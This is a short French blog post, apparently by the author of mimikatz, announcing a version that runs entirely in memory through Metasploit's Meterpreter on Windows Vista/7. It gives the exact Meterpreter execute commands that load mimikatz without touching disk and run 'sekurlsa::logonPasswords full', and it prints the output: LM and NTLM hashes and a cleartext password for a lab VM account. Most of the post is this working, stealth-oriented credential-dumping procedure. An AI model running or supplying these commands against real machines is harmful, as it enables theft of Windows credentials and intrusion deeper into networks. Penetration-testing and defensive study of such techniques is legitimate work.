mimikatz @ meterpreter

Grâce à la patience de @mubix (http://www.room362.com/), j’ai pu passer quelques commandes à Metasploit, puis meterpreter… Ce n’était pas gagné pour ce shell mystérieux meterpreter >… je m’étais habitué à mimikatz #.

Cela m’a permis de constater que le dump des mots de passe, via l’exécution en mémoire, et par lecture, ne fonctionnait pas sous NT6 (une sombre histoire d’objet mal initialisé dans bcrypt).
J’ai donc recodé une partie de mes routines afin de ne plus faire d’appels à la fonction incriminée.

Cette nouvelle version s’exécute donc très bien en mémoire, via Meterpreter, sans laisser de traces sur le disque : execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
Process 4020 created.
Channel 1 created.
mimikatz 1.0 x86 (RC)	/* Traitement du Kiwi (Sep  6 2012 04:02:46) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # sekurlsa::logonPasswords full

Authentification Id         : 0;473059
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w7-ult
	msv1_0 : 	
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w7-ult
	 * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
	 * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
	kerberos : 	
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w7-ult
	 * Mot de passe : waza1234/
	wdigest : 	
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w7-ult
	 * Mot de passe : waza1234/
	tspkg : 	
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w7-ult
	 * Mot de passe : waza1234/

J’utilise ici mimikatz en mode interactif, mais il est tout à fait possible d’utiliser la ligne de commande pour passer la liste de fonctions à appeler : execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe -a '"sekurlsa::logonPasswords full" exit'

C’est d’ailleurs ce que fait @mubix : http://www.room362.com/blog/2012/09/05/completely-in-memory-mimikatz-with-metasploit/

La version prenant en charge cette amélioration est disponible : http://blog.gentilkiwi.com/mimikatz